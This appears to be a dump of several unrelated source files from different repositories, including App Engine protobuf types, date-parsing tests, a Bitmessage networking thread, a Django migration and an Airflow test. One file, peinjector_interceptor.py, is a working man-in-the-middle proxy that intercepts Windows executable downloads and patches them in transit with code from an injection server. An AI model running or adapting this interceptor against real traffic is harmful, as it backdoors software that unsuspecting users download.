should wait before it starts collecting information from a
new instance. This prevents the autoscaler from collecting
information when the instance is initializing, during which
the collected usage would not be reliable. Only applicable
in the App Engine flexible environment.
cpu_utilization (google.cloud.appengine_admin_v1.types.CpuUtilization):
Target scaling by CPU usage.
max_concurrent_requests (int):
Number of concurrent requests an automatic
scaling instance can accept before the scheduler
spawns a new instance.
Defaults to a runtime-specific value.
max_idle_instances (int):
Maximum number of idle instances that should
be maintained for this version.
max_total_instances (int):
Maximum number of instances that should be
started to handle requests for this version.
max_pending_latency (google.protobuf.duration_pb2.Duration):
Maximum amount of time that a request should
wait in the pending queue before starting a new
instance to handle it.
min_idle_instances (int):
Minimum number of idle instances that should
be maintained for this version. Only applicable
for the default version of a service.
min_total_instances (int):
Minimum number of running instances that
should be maintained for this version.
min_pending_latency (google.protobuf.duration_pb2.Duration):
Minimum amount of time a request should wait
in the pending queue before starting a new
instance to handle it.
request_utilization (google.cloud.appengine_admin_v1.types.RequestUtilization):
Target scaling by request utilization.
disk_utilization (google.cloud.appengine_admin_v1.types.DiskUtilization):
Target scaling by disk usage.
network_utilization (google.cloud.appengine_admin_v1.types.NetworkUtilization):
Target scaling by network usage.
standard_scheduler_settings (google.cloud.appengine_admin_v1.types.StandardSchedulerSettings):
Scheduler settings for standard environment.
"""
cool_down_period = proto.Field(
proto.MESSAGE,
number=1,
message=duration_pb2.Duration,
)
cpu_utilization = proto.Field(
proto.MESSAGE,
number=2,
message='CpuUtilization',
)
max_concurrent_requests = proto.Field(
proto.INT32,
number=3,
)
max_idle_instances = proto.Field(
proto.INT32,
number=4,
)
max_total_instances = proto.Field(
proto.INT32,
number=5,
)
max_pending_latency = proto.Field(
proto.MESSAGE,
number=6,
message=duration_pb2.Duration,
)
min_idle_instances = proto.Field(
proto.INT32,
number=7,
)
min_total_instances = proto.Field(
proto.INT32,
number=8,
)
min_pending_latency = proto.Field(
proto.MESSAGE,
number=9,
message=duration_pb2.Duration,
)
request_utilization = proto.Field(
proto.MESSAGE,
number=10,
message='RequestUtilization',
)
disk_utilization = proto.Field(
proto.MESSAGE,
number=11,
message='DiskUtilization',
)
network_utilization = proto.Field(
proto.MESSAGE,
number=12,
message='NetworkUtilization',
)
standard_scheduler_settings = proto.Field(
proto.MESSAGE,
number=20,
message='StandardSchedulerSettings',
)
class BasicScaling(proto.Message):
r"""A service with basic scaling will create an instance when the
application receives a request. The instance will be turned down
when the app becomes idle. Basic scaling is ideal for work that
is intermittent or driven by user activity.
Attributes:
idle_timeout (google.protobuf.duration_pb2.Duration):
Duration of time after the last request that
an instance must wait before the instance is
shut down.
max_instances (int):
Maximum number of instances to create for
this version.
"""
idle_timeout = proto.Field(
proto.MESSAGE,
number=1,
message=duration_pb2.Duration,
)
max_instances = proto.Field(
proto.INT32,
number=2,
)
class ManualScaling(proto.Message):
r"""A service with manual scaling runs continuously, allowing you
to perform complex initialization and rely on the state of its
memory over time.
Attributes:
instances (int):
Number of instances to assign to the service at the start.
This number can later be altered by using the `Modules
API <https://cloud.google.com/appengine/docs/python/modules/functions>`__
``set_num_instances()`` function.
"""
instances = proto.Field(
proto.INT32,
number=1,
)
class CpuUtilization(proto.Message):
r"""Target scaling by CPU usage.
Attributes:
aggregation_window_length (google.protobuf.duration_pb2.Duration):
Period of time over which CPU utilization is
calculated.
target_utilization (float):
Target CPU utilization ratio to maintain when
scaling. Must be between 0 and 1.
"""
aggregation_window_length = proto.Field(
proto.MESSAGE,
number=1,
message=duration_pb2.Duration,
)
target_utilization = proto.Field(
proto.DOUBLE,
number=2,
)
class RequestUtilization(proto.Message):
r"""Target scaling by request utilization.
Only applicable in the App Engine flexible environment.
Attributes:
target_request_count_per_second (int):
Target requests per second.
target_concurrent_requests (int):
Target number of concurrent requests.
"""
target_request_count_per_second = proto.Field(
proto.INT32,
number=1,
)
target_concurrent_requests = proto.Field(
proto.INT32,
number=2,
)
class DiskUtilization(proto.Message):
r"""Target scaling by disk usage.
Only applicable in the App Engine flexible environment.
Attributes:
target_write_bytes_per_second (int):
Target bytes written per second.
target_write_ops_per_second (int):
Target ops written per second.
target_read_bytes_per_second (int):
Target bytes read per second.
target_read_ops_per_second (int):
Target ops read per seconds.
"""
target_write_bytes_per_second = proto.Field(
proto.INT32,
number=14,
)
target_write_ops_per_second = proto.Field(
proto.INT32,
number=15,
)
target_read_bytes_per_second = proto.Field(
proto.INT32,
number=16,
)
target_read_ops_per_second = proto.Field(
proto.INT32,
number=17,
)
class NetworkUtilization(proto.Message):
r"""Target scaling by network usage.
Only applicable in the App Engine flexible environment.
Attributes:
target_sent_bytes_per_second (int):
Target bytes sent per second.
target_sent_packets_per_second (int):
Target packets sent per second.
target_received_bytes_per_second (int):
Target bytes received per second.
target_received_packets_per_second (int):
Target packets received per second.
"""
target_sent_bytes_per_second = proto.Field(
proto.INT32,
number=1,
)
target_sent_packets_per_second = proto.Field(
proto.INT32,
number=11,
)
target_received_bytes_per_second = proto.Field(
proto.INT32,
number=12,
)
target_received_packets_per_second = proto.Field(
proto.INT32,
number=13,
)
class StandardSchedulerSettings(proto.Message):
r"""Scheduler settings for standard environment.
Attributes:
target_cpu_utilization (float):
Target CPU utilization ratio to maintain when
scaling.
target_throughput_utilization (float):
Target throughput utilization ratio to
maintain when scaling
min_instances (int):
Minimum number of instances to run for this version. Set to
zero to disable ``min_instances`` configuration.
max_instances (int):
Maximum number of instances to run for this version. Set to
zero to disable ``max_instances`` configuration.
"""
target_cpu_utilization = proto.Field(
proto.DOUBLE,
number=1,
)
target_throughput_utilization = proto.Field(
proto.DOUBLE,
number=2,
)
min_instances = proto.Field(
proto.INT32,
number=3,
)
max_instances = proto.Field(
proto.INT32,
number=4,
)
class Network(proto.Message):
r"""Extra network settings.
Only applicable in the App Engine flexible environment.
Attributes:
forwarded_ports (Sequence[str]):
List of ports, or port pairs, to forward from
the virtual machine to the application
container. Only applicable in the App Engine
flexible environment.
instance_tag (str):
Tag to apply to the instance during creation.
Only applicable in the App Engine flexible
environment.
name (str):
Google Compute Engine network where the virtual machines are
created. Specify the short name, not the resource path.
Defaults to ``default``.
subnetwork_name (str):
Google Cloud Platform sub-network where the virtual machines
are created. Specify the short name, not the resource path.
If a subnetwork name is specified, a network name will also
be required unless it is for the default network.
- If the network that the instance is being created in is a
Legacy network, then the IP address is allocated from the
IPv4Range.
- If the network that the instance is being created in is
an auto Subnet Mode Network, then only network name
should be specified (not the subnetwork_name) and the IP
address is created from the IPCidrRange of the subnetwork
that exists in that zone for that network.
- If the network that the instance is being created in is a
custom Subnet Mode Network, then the subnetwork_name must
be specified and the IP address is created from the
IPCidrRange of the subnetwork.
If specified, the subnetwork must exist in the same region
as the App Engine flexible environment application.
session_affinity (bool):
Enable session affinity.
Only applicable in the App Engine flexible
environment.
"""
forwarded_ports = proto.RepeatedField(
proto.STRING,
number=1,
)
instance_tag = proto.Field(
proto.STRING,
number=2,
)
name = proto.Field(
proto.STRING,
number=3,
)
subnetwork_name = proto.Field(
proto.STRING,
number=4,
)
session_affinity = proto.Field(
proto.BOOL,
number=5,
)
class Volume(proto.Message):
r"""Volumes mounted within the app container.
Only applicable in the App Engine flexible environment.
Attributes:
name (str):
Unique name for the volume.
volume_type (str):
Underlying volume type, e.g. 'tmpfs'.
size_gb (float):
Volume size in gigabytes.
"""
name = proto.Field(
proto.STRING,
number=1,
)
volume_type = proto.Field(
proto.STRING,
number=2,
)
size_gb = proto.Field(
proto.DOUBLE,
number=3,
)
class Resources(proto.Message):
r"""Machine resources for a version.
Attributes:
cpu (float):
Number of CPU cores needed.
disk_gb (float):
Disk size (GB) needed.
memory_gb (float):
Memory (GB) needed.
volumes (Sequence[google.cloud.appengine_admin_v1.types.Volume]):
User specified volumes.
kms_key_reference (str):
The name of the encryption key that is stored
in Google Cloud KMS. Only should be used by
Cloud Composer to encrypt the vm disk
"""
cpu = proto.Field(
proto.DOUBLE,
number=1,
)
disk_gb = proto.Field(
proto.DOUBLE,
number=2,
)
memory_gb = proto.Field(
proto.DOUBLE,
number=3,
)
volumes = proto.RepeatedField(
proto.MESSAGE,
number=4,
message='Volume',
)
kms_key_reference = proto.Field(
proto.STRING,
number=5,
)
class VpcAccessConnector(proto.Message):
r"""VPC access connector specification.
Attributes:
name (str):
Full Serverless VPC Access Connector name
e.g. /projects/my-project/locations/us-
central1/connectors/c1.
"""
name = proto.Field(
proto.STRING,
number=1,
)
class Entrypoint(proto.Message):
r"""The entrypoint for the application.
Attributes:
shell (str):
The format should be a shell command that can be fed to
``bash -c``.
"""
shell = proto.Field(
proto.STRING,
number=1,
oneof='command',
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
idpaterson/parsedatetime | refs/heads/master | tests/TestLocaleBase.py | 1 | # -*- coding: utf-8 -*-
"""
Test parsing of simple date and times using the French locale
Note: requires PyICU
"""
from __future__ import unicode_literals
import sys
import time
import datetime
import pytest
import parsedatetime as pdt
from parsedatetime.pdt_locales import get_icu
from . import utils
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
pdtLocale_fr = get_icu('fr_FR')
pdtLocale_fr.dayOffsets.update({"aujourd'hui": 0, 'demain': 1, 'hier': -1})
@pytest.mark.skipif(not pdtLocale_fr, reason="French Locale not found")
class test(unittest.TestCase):
@utils.assertEqualWithComparator
def assertExpectedResult(self, result, check, **kwargs):
return utils.compareResultByTimeTuplesAndFlags(result, check, **kwargs)
def setUp(self):
self.ptc = pdt.Constants('fr_FR', usePyICU=True)
self.cal = pdt.Calendar(self.ptc)
(self.yr, self.mth, self.dy, self.hr,
self.mn, self.sec, self.wd, self.yd, self.isdst) = time.localtime()
if self.ptc.localeID != 'fr_FR':
raise unittest.SkipTest(
'Locale not set to fr_FR - check if PyICU is installed')
def testTimes(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(
self.yr, self.mth, self.dy,
self.hr, self.mn, self.sec).timetuple()
target = datetime.datetime(
self.yr, self.mth, self.dy, 23, 0, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('2300', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('23:00', start), (target, 2))
target = datetime.datetime(
self.yr, self.mth, self.dy, 11, 0, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('1100', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('11:00', start), (target, 2))
target = datetime.datetime(
self.yr, self.mth, self.dy, 7, 30, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('730', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('0730', start), (target, 2))
target = datetime.datetime(
self.yr, self.mth, self.dy, 17, 30, 0).timetuple()
self.assertExpectedResult(
self.cal.parse('1730', start), (target, 2))
self.assertExpectedResult(
self.cal.parse('173000', start), (target, 2))
def testDates(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(
self.yr, self.mth, self.dy,
self.hr, self.mn, self.sec).timetuple()
target = datetime.datetime(
2006, 8, 25, self.hr, self.mn, self.sec).timetuple()
self.assertExpectedResult(
self.cal.parse('25/08/2006', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('25/8/06', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('août 25, 2006', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('août 25 2006', start), (target, 1))
if self.mth > 8 or (self.mth == 8 and self.dy > 25):
target = datetime.datetime(
self.yr + 1, 8, 25, self.hr, self.mn, self.sec).timetuple()
else:
target = datetime.datetime(
self.yr, 8, 25, self.hr, self.mn, self.sec).timetuple()
self.assertExpectedResult(
self.cal.parse('25/8', start), (target, 1))
self.assertExpectedResult(
self.cal.parse('25/08', start), (target, 1))
def testWeekDays(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(
self.yr, self.mth, self.dy,
self.hr, self.mn, self.sec).timetuple()
o1 = self.ptc.CurrentDOWParseStyle
o2 = self.ptc.DOWParseStyle
# set it up so the current dow returns current day
self.ptc.CurrentDOWParseStyle = True
self.ptc.DOWParseStyle = 1
for i in range(0, 7):
dow = self.ptc.shortWeekdays[i]
result = self.cal.parse(dow, start)
yr, mth, dy, hr, mn, sec, wd, yd, isdst = result[0]
self.assertEqual(wd, i)
self.ptc.CurrentDOWParseStyle = o1
self.ptc.DOWParseStyle = o2
@pytest.mark.skipif(not pdtLocale_fr, reason="French Locale not found")
class TestDayOffsets(test):
# test how Aujourd'hui/Demain/Hier are parsed
def setUp(self):
super(TestDayOffsets, self).setUp()
self.__old_pdtlocale_fr = pdt.pdtLocales.get('fr_FR') # save for later
pdt.pdtLocales['fr_FR'] = pdtLocale_fr # override for the test
self.ptc = pdt.Constants('fr_FR', usePyICU=False)
self.cal = pdt.Calendar(self.ptc)
def test_dayoffsets(self):
start = datetime.datetime(self.yr, self.mth, self.dy, 9)
for date_string, expected_day_offset in [
("Aujourd'hui", 0),
("aujourd'hui", 0),
("Demain", 1),
("demain", 1),
("Hier", -1),
("hier", -1),
("today", 0), # assume default names exist
("tomorrow", 1),
("yesterday", -1),
("au jour de hui", None)]:
got_dt, rc = self.cal.parseDT(date_string, start)
if expected_day_offset is not None:
self.assertEqual(rc, 1)
target = (start + datetime.timedelta(days=expected_day_offset))
self.assertEqual(got_dt, target)
else:
self.assertEqual(rc, 0)
def tearDown(self):
if self.__old_pdtlocale_fr is not None: # restore the locale
pdt.pdtLocales['fr_FR'] = self.__old_pdtlocale_fr
super(TestDayOffsets, self).tearDown()
if __name__ == "__main__":
unittest.main()
|
qbert65536/squall | refs/heads/master | src/test/python/SquallBean.py | 2 |
class SquallBean():
def __init__(self):
self.id = 0;
self.isDirty = false;
def isDirty(self):
return self.isDirty;
|
killbug2004/peinjector | refs/heads/master | pe-injector-interceptor/peinjector_interceptor.py | 17 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Interceptor - reference implementation of a Interceptor based on libmproxy with a connection to a peinjector-server
"""
__author__ = 'W.L.'
from threading import Thread
from libmproxy import controller, proxy
from libmproxy.proxy.server import ProxyServer
from libPePatch import PePatch
import sys
import datetime
import netlib
import socket
import time
import ConfigParser
"""
PE Injector specific part
"""
# Build Payload Modifier
def build_pe_modifier(flow, patch_address, config):
def modify(chunks):
# Maximum PE Header size to expect
# Maximum Patch size to expect
# Connection Timeout
# Access Token
max_header, max_patch, connection_timeout, access_token = config
header = True
patcher = None
position = 0
for prefix, content, suffix in chunks:
# Only do this for 1. chunk, and quick PE check
if header and (content[:2] == 'MZ'):
print("Intercept PE, send header to server (" + str(len(content)) + " bytes)")
# If something goes wrong while network transmission
try:
# Open socket
patch_socket = socket.create_connection(patch_address, connection_timeout)
# Send patch to server
if (patch_socket is not None) and patch_socket.send(access_token + content[:max_header]):
# Receive patch from Server
patch_mem = patch_socket.recv(max_patch)
# Close socket
patch_socket.close()
print("Received patch: " + str(len(patch_mem)) + " bytes")
patcher = PePatch(patch_mem)
if patcher.patch_ok():
print("Patch Ok")
else:
print("Error parsing patch")
patcher = None
except Exception as e:
patcher = None
# Check only 1. chunk for header
header = False
# Apply Patch
if patcher is not None:
content = patcher.apply_patch(content, position)
position += len(content)
yield prefix, content, suffix
return modify
"""
libmproxy general part
"""
# Bypass stream data without modifying
def bypass_stream(chunks):
for prefix, content, suffix in chunks:
yield prefix, content, suffix
# Stream Switcher
class StreamLargeBodies(object):
def __init__(self, max_size):
self.max_size = max_size
def run(self, flow, is_request):
r = flow.request if is_request else flow.response
code = flow.response.code if flow.response else None
expected_size = netlib.http.expected_http_body_size(
r.headers, is_request, flow.request.method, code
)
if not (0 <= expected_size <= self.max_size):
r.stream = r.stream or True
# Interception Handler
class InterceptingMaster(controller.Master):
# PE Mime Types
binaryMimeTypes = (['application/octet-stream'], ['application/x-msdownload'], ['application/msdos-windows'],
['application/x-winexe'], ['application/x-msdos-program'], ['binary/octet-stream'],
['application/exe'], ['application/x-exe'], ['application/dos-exe'])
def __init__(self, server, config):
controller.Master.__init__(self, server)
# Address of PE Patch Server
self.pe_server_address = config.get("pe", "pe_server_address")
# Port to PE Patch Server
self.pe_server_port = int(config.get("pe", "pe_server_port"))
# Minimum PE Size
self.pe_minimum_size = int(config.get("pe", "pe_minimum_size"))
self.stream_large_bodies = StreamLargeBodies(self.pe_minimum_size)
# Patch config
byte_token = bytearray.fromhex(config.get("pe", "pe_server_token"))
if (len(byte_token) != 32) or (byte_token[:2] != '\xaa\xaa'):
byte_token = '\xaa\xaa' + 30 * '\x00'
self.pe_modifier_config = (
int(config.get("pe_modifier", "max_header")),
int(config.get("pe_modifier", "max_patch")),
int(config.get("pe_modifier", "connection_timeout")),
byte_token
)
# Run Master
def runner(self):
controller.Master.run(self)
# Run Thread
def run(self):
t = Thread(target=self.runner)
t.daemon = True
t.start()
# Handles Request (modify websites, ... here)
def handle_request(self, msg):
msg.reply()
return msg
# Handles Streaming
def handle_responseheaders(self, msg):
try:
if self.stream_large_bodies:
self.stream_large_bodies.run(msg, False)
if msg.response.stream:
# PE Modifier
if msg.response.headers["Content-Type"] in self.binaryMimeTypes:
msg.response.stream = build_pe_modifier(msg, (self.pe_server_address, self.pe_server_port), self.pe_modifier_config)
# Bypass Stream
else:
msg.response.stream = bypass_stream
except netlib.http.HttpError:
msg.reply(protocol.KILL)
return
msg.reply()
return msg
# Handles 'normal' response content
def handle_response(self, msg):
msg.reply()
return msg
# Checks config and set default params
def check_config(config):
if not config.has_section("proxy"):
config.add_section("proxy")
if not config.has_section("pe"):
config.add_section("pe")
if not config.has_section("pe_modifier"):
config.add_section("pe_modifier")
if not config.has_option("proxy", "port"):
config.set("proxy", "port", "8080")
if not config.has_option("proxy", "cadir"):
config.set("proxy", "cadir", "./ca")
if not config.has_option("proxy", "mode"):
config.set("proxy", "mode", "regular")
if not config.has_option("pe", "pe_server_address"):
config.set("pe", "pe_server_address", "127.0.0.1")
if not config.has_option("pe", "pe_server_port"):
config.set("pe", "pe_server_port", "31337")
if not config.has_option("pe", "pe_server_token"):
config.set("pe", "pe_server_token", "aaaa000000000000000000000000000000000000000000000000000000000000")
if not config.has_option("pe", "pe_minimum_size"):
config.set("pe", "pe_minimum_size", "10240")
if not config.has_option("pe_modifier", "max_header"):
config.set("pe_modifier", "max_header", "4096")
if not config.has_option("pe_modifier", "max_patch"):
config.set("pe_modifier", "max_patch", "16384")
if not config.has_option("pe_modifier", "connection_timeout"):
config.set("pe_modifier", "connection_timeout", "1")
# Main routine
def main(argv):
# read config from ini file, check it and write it back
config_file = "config.ini"
config = ConfigParser.ConfigParser()
config.read(config_file)
# Check config and set defaault params
check_config(config)
# write config to file
with open(config_file, "wb") as cf:
config.write(cf)
# Configure proxy server
proxy_config = proxy.ProxyConfig(
port=int(config.get("proxy", "port")),
cadir=config.get("proxy", "cadir"),
mode=config.get("proxy", "mode")
)
# Create Server
server = ProxyServer(proxy_config)
# Creater Interceptor
imaster = InterceptingMaster(server, config)
imaster.run()
print "Intercepting Proxy listening on " + str(proxy_config.port) + " in " + str(proxy_config.mode) + " mode "
# Wait till keyboard interrupt
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print 'KeyboardInterrupt received. Shutting down'
imaster.shutdown()
sys.exit(0)
except Exception as e:
print e
print 'Exception catched.'
sys.exit(0)
# Call main
if __name__ == '__main__':
main(sys.argv) |
Voluntarynet/BitmessageKit | refs/heads/master | BitmessageKit/Vendor/pybitmessage/class_outgoingSynSender.py | 10 | import threading
import time
import random
import shared
import socks
import socket
import sys
import tr
from class_sendDataThread import *
from class_receiveDataThread import *
# For each stream to which we connect, several outgoingSynSender threads
# will exist and will collectively create 8 connections with peers.
class outgoingSynSender(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def setup(self, streamNumber, selfInitiatedConnections):
self.streamNumber = streamNumber
self.selfInitiatedConnections = selfInitiatedConnections
def _getPeer(self):
# If the user has specified a trusted peer then we'll only
# ever connect to that. Otherwise we'll pick a random one from
# the known nodes
shared.knownNodesLock.acquire()
if shared.trustedPeer:
peer = shared.trustedPeer
shared.knownNodes[self.streamNumber][peer] = time.time()
else:
peer, = random.sample(shared.knownNodes[self.streamNumber], 1)
shared.knownNodesLock.release()
return peer
def run(self):
while shared.safeConfigGetBoolean('bitmessagesettings', 'dontconnect'):
time.sleep(2)
while shared.safeConfigGetBoolean('bitmessagesettings', 'sendoutgoingconnections'):
maximumConnections = 1 if shared.trustedPeer else 8 # maximum number of outgoing connections = 8
while len(self.selfInitiatedConnections[self.streamNumber]) >= maximumConnections:
time.sleep(10)
if shared.shutdown:
break
random.seed()
peer = self._getPeer()
shared.alreadyAttemptedConnectionsListLock.acquire()
while peer in shared.alreadyAttemptedConnectionsList or peer.host in shared.connectedHostsList:
shared.alreadyAttemptedConnectionsListLock.release()
# print 'choosing new sample'
random.seed()
peer = self._getPeer()
time.sleep(1)
# Clear out the shared.alreadyAttemptedConnectionsList every half
# hour so that this program will again attempt a connection
# to any nodes, even ones it has already tried.
if (time.time() - shared.alreadyAttemptedConnectionsListResetTime) > 1800:
shared.alreadyAttemptedConnectionsList.clear()
shared.alreadyAttemptedConnectionsListResetTime = int(
time.time())
shared.alreadyAttemptedConnectionsListLock.acquire()
shared.alreadyAttemptedConnectionsList[peer] = 0
shared.alreadyAttemptedConnectionsListLock.release()
if peer.host.find(':') == -1:
address_family = socket.AF_INET
else:
address_family = socket.AF_INET6
try:
sock = socks.socksocket(address_family, socket.SOCK_STREAM)
except:
"""
The line can fail on Windows systems which aren't
64-bit compatiable:
File "C:\Python27\lib\socket.py", line 187, in __init__
_sock = _realsocket(family, type, proto)
error: [Errno 10047] An address incompatible with the requested protocol was used
So let us remove the offending address from our knownNodes file.
"""
shared.knownNodesLock.acquire()
try:
del shared.knownNodes[self.streamNumber][peer]
except:
pass
shared.knownNodesLock.release()
with shared.printLock:
print 'deleting ', peer, 'from shared.knownNodes because it caused a socks.socksocket exception. We must not be 64-bit compatible.'
continue
# This option apparently avoids the TIME_WAIT state so that we
# can rebind faster
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(20)
if shared.config.get('bitmessagesettings', 'socksproxytype') == 'none' and shared.verbose >= 2:
with shared.printLock:
print 'Trying an outgoing connection to', peer
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif shared.config.get('bitmessagesettings', 'socksproxytype') == 'SOCKS4a':
if shared.verbose >= 2:
with shared.printLock:
print '(Using SOCKS4a) Trying an outgoing connection to', peer
proxytype = socks.PROXY_TYPE_SOCKS4
sockshostname = shared.config.get(
'bitmessagesettings', 'sockshostname')
socksport = shared.config.getint(
'bitmessagesettings', 'socksport')
rdns = True # Do domain name lookups through the proxy; though this setting doesn't really matter since we won't be doing any domain name lookups anyway.
if shared.config.getboolean('bitmessagesettings', 'socksauthentication'):
socksusername = shared.config.get(
'bitmessagesettings', 'socksusername')
sockspassword = shared.config.get(
'bitmessagesettings', 'sockspassword')
sock.setproxy(
proxytype, sockshostname, socksport, rdns, socksusername, sockspassword)
else:
sock.setproxy(
proxytype, sockshostname, socksport, rdns)
elif shared.config.get('bitmessagesettings', 'socksproxytype') == 'SOCKS5':
if shared.verbose >= 2:
with shared.printLock:
print '(Using SOCKS5) Trying an outgoing connection to', peer
proxytype = socks.PROXY_TYPE_SOCKS5
sockshostname = shared.config.get(
'bitmessagesettings', 'sockshostname')
socksport = shared.config.getint(
'bitmessagesettings', 'socksport')
rdns = True # Do domain name lookups through the proxy; though this setting doesn't really matter since we won't be doing any domain name lookups anyway.
if shared.config.getboolean('bitmessagesettings', 'socksauthentication'):
socksusername = shared.config.get(
'bitmessagesettings', 'socksusername')
sockspassword = shared.config.get(
'bitmessagesettings', 'sockspassword')
sock.setproxy(
proxytype, sockshostname, socksport, rdns, socksusername, sockspassword)
else:
sock.setproxy(
proxytype, sockshostname, socksport, rdns)
try:
sock.connect((peer.host, peer.port))
rd = receiveDataThread()
rd.daemon = True # close the main program even if there are threads left
someObjectsOfWhichThisRemoteNodeIsAlreadyAware = {} # This is not necessairly a complete list; we clear it from time to time to save memory.
sendDataThreadQueue = Queue.Queue() # Used to submit information to the send data thread for this connection.
rd.setup(sock,
peer.host,
peer.port,
self.streamNumber,
someObjectsOfWhichThisRemoteNodeIsAlreadyAware,
self.selfInitiatedConnections,
sendDataThreadQueue)
rd.start()
with shared.printLock:
print self, 'connected to', peer, 'during an outgoing attempt.'
sd = sendDataThread(sendDataThreadQueue)
sd.setup(sock, peer.host, peer.port, self.streamNumber,
someObjectsOfWhichThisRemoteNodeIsAlreadyAware)
sd.start()
sd.sendVersionMessage()
except socks.GeneralProxyError as err:
if shared.verbose >= 2:
with shared.printLock:
print 'Could NOT connect to', peer, 'during outgoing attempt.', err
deletedPeer = None
with shared.knownNodesLock:
"""
It is remotely possible that peer is no longer in shared.knownNodes.
This could happen if two outgoingSynSender threads both try to
connect to the same peer, both fail, and then both try to remove
it from shared.knownNodes. This is unlikely because of the
alreadyAttemptedConnectionsList but because we clear that list once
every half hour, it can happen.
"""
if peer in shared.knownNodes[self.streamNumber]:
timeLastSeen = shared.knownNodes[self.streamNumber][peer]
if (int(time.time()) - timeLastSeen) > 172800 and len(shared.knownNodes[self.streamNumber]) > 1000: # for nodes older than 48 hours old if we have more than 1000 hosts in our list, delete from the shared.knownNodes data-structure.
del shared.knownNodes[self.streamNumber][peer]
deletedPeer = peer
if deletedPeer:
with shared.printLock:
print 'deleting', peer, 'from shared.knownNodes because it is more than 48 hours old and we could not connect to it.'
except socks.Socks5AuthError as err:
shared.UISignalQueue.put((
'updateStatusBar', tr.translateText(
"MainWindow", "SOCKS5 Authentication problem: %1").arg(str(err))))
except socks.Socks5Error as err:
pass
print 'SOCKS5 error. (It is possible that the server wants authentication).)', str(err)
except socks.Socks4Error as err:
print 'Socks4Error:', err
except socket.error as err:
if shared.config.get('bitmessagesettings', 'socksproxytype')[0:5] == 'SOCKS':
print 'Bitmessage MIGHT be having trouble connecting to the SOCKS server. ' + str(err)
else:
if shared.verbose >= 1:
with shared.printLock:
print 'Could NOT connect to', peer, 'during outgoing attempt.', err
deletedPeer = None
with shared.knownNodesLock:
"""
It is remotely possible that peer is no longer in shared.knownNodes.
This could happen if two outgoingSynSender threads both try to
connect to the same peer, both fail, and then both try to remove
it from shared.knownNodes. This is unlikely because of the
alreadyAttemptedConnectionsList but because we clear that list once
every half hour, it can happen.
"""
if peer in shared.knownNodes[self.streamNumber]:
timeLastSeen = shared.knownNodes[self.streamNumber][peer]
if (int(time.time()) - timeLastSeen) > 172800 and len(shared.knownNodes[self.streamNumber]) > 1000: # for nodes older than 48 hours old if we have more than 1000 hosts in our list, delete from the shared.knownNodes data-structure.
del shared.knownNodes[self.streamNumber][peer]
deletedPeer = peer
if deletedPeer:
with shared.printLock:
print 'deleting', peer, 'from shared.knownNodes because it is more than 48 hours old and we could not connect to it.'
except Exception as err:
sys.stderr.write(
'An exception has occurred in the outgoingSynSender thread that was not caught by other exception types: ')
import traceback
traceback.print_exc()
time.sleep(0.1)
|
adamcharnock/swiftwind | refs/heads/master | swiftwind/costs/migrations/0009_check_disabled_xor_billing_cycle.py | 2 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-09 12:14
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('costs', '0008_check_cannot_create_recurred_cost_for_disabled_cost'),
]
operations = [
migrations.RunSQL(
"""
ALTER TABLE costs_recurringcost ADD CONSTRAINT check_disabled_xor_initial_billing_cycle
CHECK (
(disabled AND initial_billing_cycle_id IS NULL)
OR
(NOT disabled AND initial_billing_cycle_id IS NOT NULL)
)
""",
"ALTER TABLE costs_recurringcost DROP CONSTRAINT check_disabled_xor_initial_billing_cycle"
)
]
|
ChinaMassClouds/copenstack-server | refs/heads/master | openstack/src/nova-2014.2/nova/api/openstack/compute/contrib/extended_networks.py | 95 | # Copyright 2014 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import extensions
class Extended_networks(extensions.ExtensionDescriptor):
"""Adds additional fields to networks."""
name = "ExtendedNetworks"
alias = "os-extended-networks"
namespace = ("http://docs.openstack.org/compute/ext/extended_networks"
"/api/v2")
updated = "2014-05-09T00:00:00Z"
|
danielvdende/incubator-airflow | refs/heads/master | tests/hooks/test_pig_hook.py | 14 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from airflow.hooks.pig_hook import PigCliHook
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
class TestPigCliHook(unittest.TestCase):
def setUp(self):
super(TestPigCliHook, self).setUp()
self.extra_dejson = mock.MagicMock()
self.extra_dejson.get.return_value = None
self.conn = mock.MagicMock()
self.conn.extra_dejson = self.extra_dejson
conn = self.conn
class SubPigCliHook(PigCliHook):
def get_connection(self, id):
return conn
self.pig_hook = SubPigCliHook
def test_init(self):
self.pig_hook()
